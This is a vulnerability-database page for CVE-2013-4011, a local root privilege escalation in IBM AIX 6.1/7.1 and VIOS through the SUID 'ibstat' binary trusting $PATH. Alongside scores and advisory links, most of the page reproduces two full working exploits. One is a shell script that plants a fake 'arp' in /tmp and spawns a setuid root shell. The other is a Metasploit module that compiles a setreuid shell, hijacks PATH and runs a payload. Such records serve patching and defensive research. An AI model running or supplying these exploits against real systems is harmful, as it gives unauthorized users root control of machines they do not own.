CVE-2013-4011 : Detail

CVE-2013-4011

EPSS: 0.14%
CVSS V3: no score listed
Attack vector: Local
Published: 2013-07-18 14:00 +00:00
Last modified: 2017-09-18 10:57 +00:00

CVE Description

Multiple unspecified vulnerabilities in the InfiniBand subsystem in IBM AIX 6.1 and 7.1, and VIOS 2.2.2.2-FP-26 SP-02, allow local users to gain privileges via vectors involving (1) arp.ib or (2) ibstat.

CVE Information

Related Weaknesses

CWE-ID       Weakness Name       Source
CWE Other    No information.

Metrics

Metric    Score    Severity    CVSS Vector                    Source
V2        7.2      High        AV:L/AC:L/Au:N/C:C/I:C/A:C     nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs according to their EPSS score. For example, a CVE in the 95th percentile by EPSS score is more likely to be exploited than 95% of all other CVEs. The percentile therefore serves to compare one CVE's EPSS score against those of other CVEs.

Exploit Information

Exploit Database EDB-ID: 28507

Publication date: 2013-09-23 22:00 +00:00
Author: Kristian Erik Hermansen
EDB Verified: Yes

# Exploit-DB Note: Screenshot provided by exploit author
#
#!/bin/sh
# Exploit Title: IBM AIX 6.1 / 7.1 local root privilege escalation
# Date: 2013-09-24
# Exploit Author: Kristian Erik Hermansen <kristian.hermansen@gmail.com>
# Vendor Homepage: http://www.ibm.com
# Software Link: http://www-03.ibm.com/systems/power/software/aix/about.html
# Version: IBM AIX 6.1 and 7.1, and VIOS 2.2.2.2-FP-26 SP-02
# Tested on: IBM AIX 6.1
# CVE: CVE-2013-4011

echo '
   mm   mmmmm  m    m
   ##     #     #  #
  #  #    #      ##
  #mm#    #     m""m
 #    # mm#mm  m"  "m
'
echo "[*] AIX root privilege escalation"
echo "[*] Kristian Erik Hermansen"
echo "[*] https://linkedin.com/in/kristianhermansen"
echo "
+++++?????????????~.:,.:+???????????++++
+++++???????????+...:.,.,.=??????????+++
+++???????????~.,:~=~:::..,.~?????????++
+++???????????:,~==++++==~,,.?????????++
+++???????????,:=+++++++=~:,,~????????++
++++?????????+,~~=++++++=~:,,:????????++
+++++????????~,~===~=+~,,::,:+???????+++
++++++???????=~===++~~~+,,~::???????++++
++++++++?????=~=+++~~~:++=~:~+???+++++++
+++++++++????~~=+++~+=~===~~:+??++++++++
+++++++++?????~~=====~~==~:,:?++++++++++
++++++++++????+~==:::::=~:,+??++++++++++
++++++++++?????:~~=~~~~~::,??+++++++++++
++++++++++?????=~:~===~,,,????++++++++++
++++++++++???+:==~:,,.:~~..+??++++++++++
+++++++++++....==+===~~=~,...=?+++++++++
++++++++,........~=====..........+++++++
+++++................................++=
=+:....................................=
"

TMPDIR=/tmp
TAINT=${TMPDIR}/arp
RSHELL=${TMPDIR}/r00t-sh

cat > ${TAINT} <<-!
#!/bin/sh
cp /bin/sh ${RSHELL}
chown root ${RSHELL}
chmod 4555 ${RSHELL}
!

chmod 755 ${TAINT}
PATH=.:${PATH}
export PATH
cd ${TMPDIR}
/usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null

if [ -e ${RSHELL} ]; then
    echo "[+] Access granted. Don't be evil..."
    ${RSHELL}
else
    echo "[-] Exploit failed. Try some 0day instead..."
fi

Exploit Database EDB-ID: 32700

Publication date: 2014-04-03 22:00 +00:00
Author: Metasploit
EDB Verified: Yes

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class Metasploit4 < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      "Name"           => "ibstat $PATH Privilege Escalation",
      "Description"    => %q{
        This module exploits the trusted $PATH environment variable of the SUID binary "ibstat".
      },
      "Author"         => [
        "Kristian Erik Hermansen", #original author
        "Sagi Shahar <sagi.shahar[at]mwrinfosecurity.com>", #Metasploit module
        "Kostas Lintovois <kostas.lintovois[at]mwrinfosecurity.com>" #Metasploit module
      ],
      "References"     => [
        ["CVE", "2013-4011"],
        ["OSVDB", "95420"],
        ["BID", "61287"],
        ["URL", "http://www-01.ibm.com/support/docview.wss?uid=isg1IV43827"],
        ["URL", "http://www-01.ibm.com/support/docview.wss?uid=isg1IV43756"]
      ],
      "Platform"       => ["unix"],
      "Arch"           => ARCH_CMD,
      "Payload"        => {
        "Compat" => {
          "PayloadType" => "cmd",
          "RequiredCmd" => "perl"
        }
      },
      "Targets"        => [
        ["IBM AIX Version 6.1", {}],
        ["IBM AIX Version 7.1", {}]
      ],
      "DefaultTarget"  => 1,
      "DisclosureDate" => "Sep 24 2013"
    ))

    register_options([
      OptString.new("WritableDir", [true, "A directory where we can write files", "/tmp"])
    ], self.class)
  end

  def check
    find_output = cmd_exec("find /usr/sbin/ -name ibstat -perm -u=s -user root 2>/dev/null")
    if find_output.include?("ibstat")
      return Exploit::CheckCode::Vulnerable
    end
    Exploit::CheckCode::Safe
  end

  def exploit
    if check == Exploit::CheckCode::Safe
      fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
    else
      print_good("Target is vulnerable.")
    end

    root_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}"
    arp_file = "#{datastore["WritableDir"]}/arp"

    c_file = %Q^#include <stdio.h>
int main() {
  setreuid(0,0);
  setregid(0,0);
  execve("/bin/sh",NULL,NULL);
  return 0;
}
^

    arp = %Q^#!/bin/sh
chown root #{root_file}
chmod 4555 #{root_file}
^

    if gcc_installed?
      print_status("Dropping file #{root_file}.c...")
      write_file("#{root_file}.c", c_file)
      print_status("Compiling source...")
      cmd_exec("gcc -o #{root_file} #{root_file}.c")
      print_status("Compilation completed")
      register_file_for_cleanup("#{root_file}.c")
    else
      cmd_exec("cp /bin/sh #{root_file}")
    end
    register_file_for_cleanup(root_file)

    print_status("Writing custom arp file...")
    write_file(arp_file,arp)
    register_file_for_cleanup(arp_file)
    cmd_exec("chmod 0555 #{arp_file}")
    print_status("Custom arp file written")

    print_status("Updating $PATH environment variable...")
    path_env = cmd_exec("echo $PATH")
    cmd_exec("PATH=#{datastore["WritableDir"]}:$PATH")
    cmd_exec("export PATH")

    print_status("Triggering vulnerablity...")
    cmd_exec("/usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null")

    # The $PATH variable must be restored before the payload is executed
    # in cases where an euid root shell was gained
    print_status("Restoring $PATH environment variable...")
    cmd_exec("PATH=#{path_env}")
    cmd_exec("export PATH")

    cmd_exec(root_file)

    print_status("Checking root privileges...")
    if is_root?
      print_status("Executing payload...")
      cmd_exec(payload.encoded)
    end
  end

  def gcc_installed?
    print_status("Checking if gcc exists...")
    gcc_whereis_output = cmd_exec("whereis -b gcc")
    if gcc_whereis_output.include?("/")
      print_good("gcc found!")
      return true
    end
    print_status("gcc not found. Using /bin/sh from local system")
    false
  end

  def is_root?
    id_output = cmd_exec("id")
    if id_output.include?("euid=0(root)")
      print_good("Got root! (euid)")
      return true
    end
    if id_output.include?("uid=0(root)")
      print_good("Got root!")
      return true
    end
    print_status("Exploit failed")
    false
  end
end

Products Mentioned

Configuration 0

IBM >> AIX >> Version 6.1

IBM >> AIX >> Version 7.1

IBM >> VIOS >> Version 2.2.2.2

References

http://secunia.com/advisories/54215
Tags: third-party-advisory, x_refsource_SECUNIA
http://www.ibm.com/support/docview.wss?uid=isg1IV43562
Tags: vendor-advisory, x_refsource_AIXAPAR
http://www.securitytracker.com/id/1028792
Tags: vdb-entry, x_refsource_SECTRACK
http://www.ibm.com/support/docview.wss?uid=isg1IV43580
Tags: vendor-advisory, x_refsource_AIXAPAR
http://www.ibm.com/support/docview.wss?uid=isg1IV43827
Tags: vendor-advisory, x_refsource_AIXAPAR
http://osvdb.org/95419
Tags: vdb-entry, x_refsource_OSVDB
http://www.ibm.com/support/docview.wss?uid=isg1IV43561
Tags: vendor-advisory, x_refsource_AIXAPAR
http://osvdb.org/95420
Tags: vdb-entry, x_refsource_OSVDB
http://www.ibm.com/support/docview.wss?uid=isg1IV43582
Tags: vendor-advisory, x_refsource_AIXAPAR
http://www.ibm.com/support/docview.wss?uid=isg1IV43756
Tags: vendor-advisory, x_refsource_AIXAPAR
http://www.securityfocus.com/bid/61287
Tags: vdb-entry, x_refsource_BID